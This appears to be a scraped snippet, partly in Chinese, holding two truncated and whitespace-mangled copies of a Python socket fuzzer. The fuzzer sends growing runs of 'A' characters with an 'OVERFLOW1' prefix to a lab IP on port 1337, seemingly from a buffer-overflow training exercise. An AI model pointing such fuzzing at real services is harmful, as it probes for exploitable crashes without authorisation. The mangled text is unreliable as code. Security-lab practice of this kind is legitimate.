我将timeout设置为10prefix ="OVERFLOW1 "string = prefix +"A"*100whileTrue:try:withsocket.socket(socket.AF_INET, socket.SOCK_STREAM)ass:s.settimeout(timeout)s.connect((ip, port))s.recv(1024)print("Fuzzing with {} bytes".format(len(string) -len(prefix)))s.send(bytes...
ip="10.10.61.138"port=1337timeout=5prefix="OVERFLOW1 "string=prefix+"A"*100while True:try:with socket.socket(socket.AF_INET,socket.SOCK_STREAM)as s:s.settimeout(timeout)s.connect((ip,port))s.recv(1024)print("Fuzzing with {} bytes".format(len(string)-len(prefix)))s.send(bytes(stri...